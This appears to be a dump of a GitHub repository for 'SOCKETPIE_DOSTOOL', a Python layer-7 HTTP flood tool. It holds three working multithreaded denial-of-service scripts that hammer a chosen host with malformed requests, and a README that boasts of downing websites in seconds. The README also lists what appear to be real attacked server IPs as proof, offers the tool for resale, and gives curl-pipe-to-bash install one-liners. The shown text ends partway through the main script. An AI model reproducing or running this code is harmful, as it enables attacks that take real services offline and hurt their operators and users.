├── FLOOD_MESSAGE.png
├── FOLDER_UPDATE
├── UPDATE-3_14_2023_PIE.py
└── UPDATE-3_24_2023_PIE.py
├── INPUT_ALL.png
├── README.md
├── login.txt
├── pie.py
├── proof.mp4
└── target.txt
/FLOOD_MESSAGE.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hex1629/SOCKETPIE_DOSTOOL/025c4a7f956a6a87d5f479b0de550a3e5b3a167d/FLOOD_MESSAGE.png
--------------------------------------------------------------------------------
/FOLDER_UPDATE/UPDATE-3_14_2023_PIE.py:
--------------------------------------------------------------------------------
1 | # CHECK IMPORT
2 | try:
3 | import socket
4 | import threading
5 | import string
6 | import random
7 | import time
8 | import os
9 | import platform
10 | import sys
11 | from colorama import Fore
12 | except ModuleNotFoundError as e:
13 | print(f"{e} CAN'T IMPORT . . . .")
14 | exit()
15 |
16 | # DEF & CLASS
17 |
18 | def clear_text():
19 | if platform.system().upper() == "WINDOWS":
20 | os.system('cls')
21 | else:
22 | os.system('clear')
23 |
24 | def status_print(ip,port,thread_id,rps,path_get):
25 | print(f"{Fore.YELLOW}FLOODING {Fore.LIGHTYELLOW_EX}HTTP {Fore.WHITE}---> {Fore.BLUE}TARGET{Fore.WHITE}={ip}:{port} {Fore.LIGHTBLUE_EX}PATH{Fore.WHITE}={path_get} {Fore.CYAN}RPS{Fore.WHITE}={rps} {Fore.LIGHTCYAN_EX}ID{Fore.WHITE}={thread_id}{Fore.RESET}")
26 | def generate_url_path_pyflooder(num):
27 | msg = str(string.ascii_letters + string.digits + string.punctuation)
28 | data = "".join(random.sample(msg, int(num)))
29 | return data
30 |
31 | def generate_url_path_choice(num):
32 | letter = '''abcdefghijklmnopqrstuvwxyzABCDELFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;?@[\]^_`{|}~'''
33 | data = ""
34 | for _ in range(int(num)):
35 | data += random.choice(letter)
36 | return data
37 |
38 | # DOS
39 | def DoS_Attack(ip,host,port,type_attack,id,booter_sent):
40 | rps = 0
41 | url_path = ''
42 | path_get = ['PY_FLOOD','CHOICES_FLOOD']
43 | path_get_loader = random.choice((path_get))
44 | if path_get_loader == "PY_FLOOD":
45 | url_path = generate_url_path_pyflooder(5)
46 | else:
47 | url_path = generate_url_path_choice(5)
48 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
49 | try:
50 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n".encode()
51 | s.connect((ip,port))
52 | for _ in range(booter_sent):
53 | s.sendall(packet_data)
54 | s.send(packet_data)
55 | rps += 2
56 | except:
57 | try:
58 | s.shutdown(socket.SHUT_RDWR)
59 | s.close()
60 | except:
61 | pass
62 | status_print(ip,port,id,rps,path_get_loader)
63 |
64 | status_code = False
65 | id_loader = 0
66 | def runing_attack(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent):
67 | global status_code,id_loader
68 | if status_code == True:
69 | while time.time() < time_loader:
70 | for _ in range(spam_loader):
71 | id_loader += 1
72 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent))
73 | th.start()
74 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent))
75 | th.start()
76 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent))
77 | th.start()
78 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent))
79 | th.start()
80 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent))
81 | th.start()
82 | else:
83 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start()
84 |
85 | #DATA
86 | banner = f"""
87 | {Fore.YELLOW} __..---..__
88 | {Fore.YELLOW} ,-=' {Fore.RED}/ | \ {Fore.YELLOW}`=-.
89 | {Fore.WHITE}:--..___________..--;
90 | {Fore.WHITE} \.,_____________,./
91 |
92 | {Fore.RED}╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐
93 | {Fore.LIGHTRED_EX}╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤
94 | {Fore.WHITE}╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘ {Fore.YELLOW}# (OFFLINE) {Fore.LIGHTYELLOW_EX}TOOL #{Fore.RESET}"""
95 |
96 | print(banner)
97 | host = ""
98 | ip = ""
99 | target_loader = input(f"{Fore.LIGHTYELLOW_EX}IP/URL>")
100 | port_loader = int(input(f"{Fore.YELLOW}PORT>"))
101 | time_loader = time.time() + int(input(f"{Fore.LIGHTRED_EX}TIME (DEFAULT=250)>"))
102 | spam_loader = int(input(f"{Fore.RED}SPAM THREAD (DEFAULT=50 OR 299)>"))
103 | create_thread = int(input(F"{Fore.LIGHTGREEN_EX}CREATE THREAD (DEFAULT=50)>"))
104 | booter_sent = int(input(F"{Fore.GREEN}BOOTER SENT (DEFAULT=500)>"))
105 | print(f"{Fore.LIGHTCYAN_EX} EXAMPLE HTTP METHODS> CONNECT GET PUT PATCH POST HEAD DELETE OPTIONS TRACE")
106 | print(f"{Fore.CYAN}EXAMPLE CUSTOM HTTP METHODS> PANOS MIRAI EXPLOIT LOGSHELL SERVER CLOUDFLARE AGE PYFLOODER GATEWAY")
107 | methods_loader = input(F"{Fore.LIGHTBLUE_EX}HTTP_METHODS (EXAMPLE=GATEWAY)>")
108 | print(f"{Fore.MAGENTA}TRYING TO GET IP:PORT {Fore.LIGHTMAGENTA_EX}. . .{Fore.RESET}")
109 | try:
110 | host = str(target_loader).replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
111 | ip = socket.gethostbyname(host)
112 | except socket.gaierror:
113 | exit()
114 | for loader_num in range(create_thread):
115 | sys.stdout.write(f"\r {Fore.YELLOW}{loader_num} CREATE THREAD . . .{Fore.RESET}")
116 | sys.stdout.flush()
117 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start()
118 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start()
119 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start()
120 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start()
121 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start()
122 | clear_text()
123 | print(banner)
124 | status_code = True
125 | print(f"{Fore.GREEN}TRYING SENT . . .{Fore.RESET}")
126 |
--------------------------------------------------------------------------------
/FOLDER_UPDATE/UPDATE-3_24_2023_PIE.py:
--------------------------------------------------------------------------------
1 | # CHECK IMPORT
2 | try:
3 | import socket
4 | import threading
5 | import string
6 | import random
7 | import time
8 | import os
9 | import platform
10 | import sys
11 | from colorama import Fore
12 | except ModuleNotFoundError as e:
13 | print(f"{e} CAN'T IMPORT . . . .")
14 | exit()
15 |
16 | # DEF & CLASS
17 |
18 | def clear_text():
19 | if platform.system().upper() == "WINDOWS":
20 | os.system('cls')
21 | else:
22 | os.system('clear')
23 |
24 | def status_print(ip,port,thread_id,rps,path_get):
25 | print(f"{Fore.YELLOW}FLOODING {Fore.LIGHTYELLOW_EX}HTTP{Fore.WHITE} {Fore.WHITE}---> {Fore.BLUE}TARGET{Fore.WHITE}={ip}:{port} {Fore.LIGHTBLUE_EX}PATH{Fore.WHITE}={path_get} {Fore.CYAN}RPS{Fore.WHITE}={rps} {Fore.LIGHTCYAN_EX}ID{Fore.WHITE}={thread_id}{Fore.RESET}")
26 | def generate_url_path_pyflooder(num):
27 | msg = str(string.ascii_letters + string.digits + string.punctuation)
28 | data = "".join(random.sample(msg, int(num)))
29 | return data
30 |
31 | def generate_url_path_choice(num):
32 | letter = '''abcdefghijklmnopqrstuvwxyzABCDELFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;?@[\]^_`{|}~'''
33 | data = ""
34 | for _ in range(int(num)):
35 | data += random.choice(letter)
36 | return data
37 |
38 | # DOS
39 | def DoS_Attack(ip,host,port,type_attack,id,booter_sent,data_type_loader_packet):
40 | rps = 0
41 | url_path = ''
42 | path_get = ['PY_FLOOD','CHOICES_FLOOD']
43 | path_get_loader = random.choice((path_get))
44 | if path_get_loader == "PY_FLOOD":
45 | url_path = generate_url_path_pyflooder(5)
46 | else:
47 | url_path = generate_url_path_choice(5)
48 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
49 | try:
50 | if data_type_loader_packet == 'PY' or data_type_loader_packet == 'PYF':
51 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n".encode()
52 | elif data_type_loader_packet == 'OWN1':
53 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\r\r".encode()
54 | elif data_type_loader_packet == 'OWN2':
55 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\r\r\n\n".encode()
56 | elif data_type_loader_packet == 'OWN3':
57 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n".encode()
58 | elif data_type_loader_packet == 'OWN4':
59 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n".encode()
60 | elif data_type_loader_packet == 'OWN5':
61 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n\r\r\r\r".encode()
62 | s.connect((ip,port))
63 | for _ in range(booter_sent):
64 | s.sendall(packet_data)
65 | s.send(packet_data)
66 | rps += 2
67 | except:
68 | try:
69 | s.shutdown(socket.SHUT_RDWR)
70 | s.close()
71 | except:
72 | pass
73 | status_print(ip,port,id,rps,path_get_loader)
74 |
75 | status_code = False
76 | id_loader = 0
77 | def runing_attack(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet):
78 | global status_code,id_loader
79 | if status_code == True:
80 | while time.time() < time_loader:
81 | for _ in range(spam_loader):
82 | id_loader += 1
83 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet))
84 | th.start()
85 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet))
86 | th.start()
87 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet))
88 | th.start()
89 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet))
90 | th.start()
91 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet))
92 | th.start()
93 | else:
94 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start()
95 |
96 | #DATA
97 | banner = f"""
98 | {Fore.YELLOW} __..---..__
99 | {Fore.YELLOW} ,-=' {Fore.RED}/ | \ {Fore.YELLOW}`=-.
100 | {Fore.WHITE}:--..___________..--;
101 | {Fore.WHITE} \.,_____________,./
102 |
103 | {Fore.RED}╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐
104 | {Fore.LIGHTRED_EX}╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤
105 | {Fore.WHITE}╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘ {Fore.YELLOW}# (OFFLINE) {Fore.LIGHTYELLOW_EX}TOOL v2 #{Fore.RESET}"""
106 |
107 | print(banner)
108 | host = ""
109 | ip = ""
110 | print(f"{Fore.LIGHTWHITE_EX}PYF OWN1-5")
111 | data_type_loader_packet = input(F"{Fore.WHITE}TYPE PACKET (DEFAULT=PYF EXAMPLE=OWN1)>").upper()
112 | target_loader = input(f"{Fore.LIGHTYELLOW_EX}IP/URL>")
113 | port_loader = int(input(f"{Fore.YELLOW}PORT>"))
114 | time_loader = time.time() + int(input(f"{Fore.LIGHTRED_EX}TIME (DEFAULT=250)>"))
115 | spam_loader = int(input(f"{Fore.RED}SPAM THREAD (DEFAULT=50 EXAMPLE=299)>"))
116 | create_thread = int(input(F"{Fore.LIGHTGREEN_EX}CREATE THREAD (DEFAULT=50)>"))
117 | booter_sent = int(input(F"{Fore.GREEN}BOOTER SENT (DEFAULT=500 EXAMPLE=65536)>"))
118 | print(f"{Fore.LIGHTCYAN_EX} EXAMPLE HTTP METHODS> CONNECT GET PUT PATCH POST HEAD DELETE OPTIONS TRACE")
119 | print(f"{Fore.CYAN}EXAMPLE CUSTOM HTTP METHODS> PANOS MIRAI EXPLOIT LOGSHELL SERVER CLOUDFLARE AGE PYFLOODER GATEWAY")
120 | methods_loader = input(F"{Fore.LIGHTBLUE_EX}HTTP_METHODS (EXAMPLE=GATEWAY)>").upper()
121 | spam_create_thread = int(input(F"{Fore.LIGHTBLACK_EX}SPAM CREATE THREAD (DEFAULT=5 EXAMPLE=15)>"))
122 | print(f"{Fore.MAGENTA}TRYING TO GET IP:PORT {Fore.LIGHTMAGENTA_EX}. . .{Fore.RESET}")
123 | try:
124 | host = str(target_loader).replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
125 | ip = socket.gethostbyname(host)
126 | except socket.gaierror:
127 | exit()
128 | for loader_num in range(create_thread):
129 | sys.stdout.write(f"\r {Fore.YELLOW}{loader_num} CREATE THREAD . . .{Fore.RESET}")
130 | sys.stdout.flush()
131 |
132 | for _ in range(spam_create_thread):
133 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start()
134 | clear_text()
135 | print(banner)
136 | status_code = True
137 | print(f"{Fore.GREEN}TRYING SENT . . .{Fore.RESET}")
138 |
--------------------------------------------------------------------------------
/INPUT_ALL.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hex1629/SOCKETPIE_DOSTOOL/025c4a7f956a6a87d5f479b0de550a3e5b3a167d/INPUT_ALL.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SOCKETPIE_DOSTOOL 🌌
2 |
3 | 🛠️ DOS TOOL WITH PYTHON LAYER7 :) (HTTP FLOOD🌊)
4 |
5 | ⚙️ TECHNIQUES FLOOD (TCP FLOOD ATTACK🌊)
6 |
7 | 💥 DOWN HTTP WEBSITE TAKE ⏳6-29 SECS🌊 (SOME WEBSITE)
8 |
9 | ⚙️ (⏳DOWN HTTP SMALL SERVER💥) ⚙️
10 |
11 | 🛠️⚙️ I MADE HTTPS FLOOD NOW🌊
12 |
13 | # INSTALL
14 |
15 | **REPLIT**
16 | ```
17 | curl -O https://raw.githubusercontent.com/Hex1629/INSTALL_MYPROJECT/main/INSTALL_SCRIPT/socketpie.replit && bash socketpie.replit
18 | ```
19 |
20 | **LINUX**
21 | ```
22 | curl -O https://raw.githubusercontent.com/Hex1629/INSTALL_MYPROJECT/main/INSTALL_SCRIPT/socketpie.linux && bash socketpie.linux
23 | ```
24 |
25 | **WINDOWS**
26 | ```
27 | cd Downloads && cd SOCKETPIE_DOSTOOL-main && pip install requests && pip install colorama && python pie.py
28 | ```
29 |
30 | # UPDATE ⏳
31 |
32 | IF YOU WANNA USE OLD CODE PIE PLS GO TO THIS 📁FOLDER --> FOLDER_UPDATE⚙️
33 |
34 | (UPDATE-3_24_2023_PIE.py) <--- OLD PIE TOOL🌊
35 |
36 | # HIT DSTAT LAYER7🚀
37 | 📌 100K RPS IN VEDBEX DSTAT 📈(51.159.30.249)📈
38 |
39 | 📌 17K RPS IN DSTATSEC.GITHUB.IO DSTAT 📈(109.71.9.87)💥
40 |
41 | 📌 1.5M RPS IN DSTAT.GITHUB.IO 📈(51.15.25.108)💥
42 |
43 | 📌 3M RPS IN DSTAT.XYZ 📈(Worldstream-1 - 185.132.134.228)📈
44 |
45 | 💣 ATTACK SERVER ⏳(167.71.202.248)💥
46 |
47 | 💣 ATTACK NETDATA DASHBOARD ⏳(45.32.80.25)💥
48 |
49 | 💣 ATTACK SERVER ⏳(104.253.87.11)💥
50 |
51 |
🌊 GUI SOCKET.PIE🥧 DOS TOOL 🌊
52 |
53 | 
54 |
55 | 
56 |
57 |
58 |
59 |
60 |
61 | 🌊 PROOF🎬 🌊
62 |
63 | https://user-images.githubusercontent.com/93824226/224772072-c9f767c6-e265-42dd-951a-d7238d449b1d.mp4
64 |
65 | https://user-images.githubusercontent.com/93824226/224707531-13c89059-9537-4ac5-87a6-40f3e1508a3d.mp4
66 |
67 | https://user-images.githubusercontent.com/93824226/224642391-d1f90a2d-4730-4bbb-939e-5231ba658fe2.mp4
68 |
69 |
70 | # MAKE BY Hex1629 (👤🛠️)
71 | 💸 YOU CAN RESELL BUT YOU NEED TO WRITE CREDIT ME.
72 |
73 | 🛠️📁 IF YOU MAKE NEW VERSIONS WRITE CREDIT YOU TOO.
74 |
75 | 📌 DON'T FORGOT ! ! !
76 |
77 | # FAQ
78 |
79 | Why i cant login ?
80 |
81 | Just only type ROOT and press enter
82 |
83 |
84 | It working for cloudflare ?
85 |
86 | No it's not https flooding
87 |
88 |
--------------------------------------------------------------------------------
/login.txt:
--------------------------------------------------------------------------------
1 | ROOT@SOCKET.PIE
2 | ADMIN@SOCKET.PIE
3 | ROOT@ROOT
4 | ADMIN@ADMIN
5 | USER@127.0.0.1
6 | KALI@KALI
7 | HEX1628@DEV
8 |
--------------------------------------------------------------------------------
/pie.py:
--------------------------------------------------------------------------------
1 | # CHECK IMPORT
2 | try:
3 | import socket
4 | import threading
5 | import string
6 | import random
7 | import time
8 | import os
9 | import platform
10 | import sys
11 | import requests
12 | from colorama import Fore
13 | except ModuleNotFoundError as e:
14 | print(f"{e} CAN'T IMPORT . . . . ")
15 | exit()
16 |
17 | GUI_SETUP = 0
18 |
19 | # DEF & CLASS
20 |
21 | username = ''
22 | password = ''
23 |
24 | def login_checker(username,password):
25 | file_path = os.path.join(os.path.dirname(__file__), 'login.txt')
26 | try:
27 | with open(file_path) as f:
28 | credentials = [x.strip() for x in f.readlines() if x.strip()]
29 | for x in credentials:
30 | c_username, c_password = x.split('@')
31 | if c_username.upper() == username.upper() and c_password.upper() == password.upper():
32 | return True
33 | except FileNotFoundError:
34 | return 'UNKNOWN ERROR ARE RETURNING BY FILESNOTFOUND'
35 |
36 | def clear_text():
37 | if platform.system().upper() == "WINDOWS":
38 | os.system('cls')
39 | else:
40 | os.system('clear')
41 |
42 | def generate_url_path_pyflooder(num):
43 | msg = str(string.ascii_letters + string.digits + string.punctuation)
44 | data = "".join(random.sample(msg, int(num)))
45 | return data
46 |
47 | def generate_url_path_choice(num):
48 | letter = '''abcdefghijklmnopqrstuvwxyzABCDELFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;?@[\]^_`{|}~'''
49 | data = ""
50 | for _ in range(int(num)):
51 | data += random.choice(letter)
52 | return data
53 |
54 | # DOS
55 | def DoS_Attack(ip,host,port,type_attack,booter_sent,data_type_loader_packet):
56 | url_path = ''
57 | path_get = ['PY_FLOOD','CHOICES_FLOOD']
58 | path_get_loader = random.choice((path_get))
59 | if path_get_loader == "PY_FLOOD":
60 | url_path = generate_url_path_pyflooder(5)
61 | else:
62 | url_path = generate_url_path_choice(5)
63 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
64 | try:
65 | if data_type_loader_packet == 'PY' or data_type_loader_packet == 'PYF':
66 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n".encode()
67 | elif data_type_loader_packet == 'OWN1':
68 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\r\r".encode()
69 | elif data_type_loader_packet == 'OWN2':
70 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\r\r\n\n".encode()
71 | elif data_type_loader_packet == 'OWN3':
72 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n".encode()
73 | elif data_type_loader_packet == 'OWN4':
74 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n".encode()
75 | elif data_type_loader_packet == 'OWN5':
76 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n\r\r\r\r".encode()
77 | elif data_type_loader_packet == 'OWN6':
78 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n\r\n".encode()
79 | elif data_type_loader_packet == 'OWN7':
80 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n\r".encode()
81 | elif data_type_loader_packet == 'OWN8':
82 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\r\n\r".encode()
83 | elif data_type_loader_packet == 'TEST':
84 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\r\n\r\n\n".encode()
85 | elif data_type_loader_packet == 'TEST2':
86 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\n\r\r\n\r\n\n\n".encode()
87 | elif data_type_loader_packet == 'TEST3':
88 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\a\n\r\n\n".encode()
89 | elif data_type_loader_packet == 'TEST4':
90 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\a\n\a\n\n\r\r".encode()
91 | elif data_type_loader_packet == 'TEST5':
92 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\t\n\n\r\r".encode()
93 | s.connect((ip,port))
94 | for _ in range(booter_sent):
95 | s.sendall(packet_data)
96 | s.send(packet_data)
97 | except:
98 | try:
99 | s.shutdown(socket.SHUT_RDWR)
100 | s.close()
101 | except:
102 | pass
103 |
104 | status_code = False
105 | def runing_attack(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet):
106 | global status_code
107 | if status_code == True:
108 | while time.time() < time_loader:
109 | for _ in range(spam_loader):
110 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet))
111 | th.start()
112 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet))
113 | th.start()
114 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet))
115 | th.start()
116 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet))
117 | th.start()
118 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet))
119 | th.start()
120 | else:
121 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start()
122 | prefix_get = "!"
123 | status_help_type = 0
124 | def command():
125 | global status_help_type,status_code,prefix_get,username,password,GUI_SETUP
126 | if status_help_type == 0:
127 | print(f"{Fore.LIGHTYELLOW_EX} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.RED} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐\n{Fore.LIGHTRED_EX} ╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ \n{Fore.WHITE} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘\n {Fore.WHITE}[{Fore.GREEN}+{Fore.WHITE}] {Fore.WHITE}< {Fore.LIGHTGREEN_EX}TYPE {prefix_get}HELP FOR SHOW COMMAND {Fore.WHITE}> {Fore.RESET}")
128 | status_help_type += 1
129 | else:
130 | pass
131 |
132 | data_input_loader = input(f"{Fore.CYAN}{username}{Fore.WHITE}@{Fore.BLUE}{password} {Fore.WHITE}${Fore.RESET}")
133 | args_get = data_input_loader.split(" ")
134 | if args_get[0].upper() == f"{prefix_get}CREDIT":
135 | print(f"{Fore.YELLOW} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.LIGHTYELLOW_EX} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗{Fore.RED}┌─┐┬┌─┐\n{Fore.YELLOW} ╚═╗║ ║║ ╠╩╗║╣ ║{Fore.LIGHTRED_EX} ├─┘│├┤ \n{Fore.LIGHTRED_EX} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩{Fore.WHITE}o{Fore.LIGHTYELLOW_EX}┴ ┴└─┘\n\n{Fore.LIGHTMAGENTA_EX}CREDIT {Fore.WHITE}- {Fore.LIGHTBLUE_EX}ART {Fore.WHITE}: {Fore.CYAN}Riitta Rasimus {Fore.WHITE}- {Fore.LIGHTCYAN_EX}ascii.co.uk/art/pie {Fore.WHITE}|{Fore.GREEN} DEV {Fore.WHITE}- {Fore.LIGHTGREEN_EX}github.com/Hex1629{Fore.RESET}")
136 | elif args_get[0].upper() == f"{prefix_get}HELP":
137 | print(f"{Fore.GREEN}┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━┓\n┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┻━┫\n{Fore.LIGHTGREEN_EX}┃ HELP COMMAND . menu ┃\n{Fore.GREEN}┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫\n {Fore.RED}{prefix_get}HELP {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For show command\n {Fore.RED}{prefix_get}CREDIT {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For show credit\n {Fore.RED}{prefix_get}CLS {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For clear all screen\n {Fore.RED}{prefix_get}MENU {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For return to menu\n {Fore.RED}{prefix_get}GUI_SET {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For change gui attack\n {Fore.RED}{prefix_get}PREFIX_SET {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For set prefix\n {Fore.RED}{prefix_get}FLOOD {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For attack target with http flood\n {Fore.RED}{prefix_get}PING_URL {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For ping test with url\n {Fore.RED}{prefix_get}PING_TCP {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For ping test with tcp\n {Fore.RED}{prefix_get}EXIT {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For exit from panel\n{Fore.GREEN}┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛{Fore.RESET}")
138 | elif args_get[0].upper() == f"{prefix_get}PREFIX_SET":
139 | if len(args_get) == 2:
140 | prefix_get = args_get[1]
141 | clear_text()
142 | print(f"{Fore.LIGHTYELLOW_EX} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.RED} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐\n{Fore.LIGHTRED_EX} ╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ \n{Fore.WHITE} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘\n {Fore.WHITE}[{Fore.GREEN}+{Fore.WHITE}] {Fore.WHITE}< {Fore.LIGHTGREEN_EX}TYPE {prefix_get}HELP FOR SHOW COMMAND {Fore.WHITE}> {Fore.RESET}")
143 | else:
144 | print(f"{Fore.YELLOW}{prefix_get}PREFIX_SET {Fore.RESET}")
145 | elif args_get[0].upper() == f"{prefix_get}GUI_SET":
146 | if len(args_get) == 2:
147 | gui_leak = args_get[1].upper()
148 | if gui_leak == "OLD":
149 | GUI_SETUP = 0
150 | elif gui_leak == "TEXT":
151 | GUI_SETUP = 1
152 | elif gui_leak == "TEXT2":
153 | GUI_SETUP = 2
154 | elif gui_leak == "TEXT3":
155 | GUI_SETUP = 3
156 | else:
157 | print(f"{Fore.RED}{prefix_get}GUI_SET {Fore.LIGHTRED_EX}{Fore.RESET}")
158 | print(f"{Fore.GREEN}MODE ---> OLD TEXT TEXT2 TEXT3{Fore.RESET}")
159 | elif args_get[0].upper() == f"{prefix_get}CLEAR" or args_get[0].upper() == f"{prefix_get}CLS":
160 | clear_text()
161 | elif args_get[0].upper() == f"{prefix_get}MENU":
162 | clear_text()
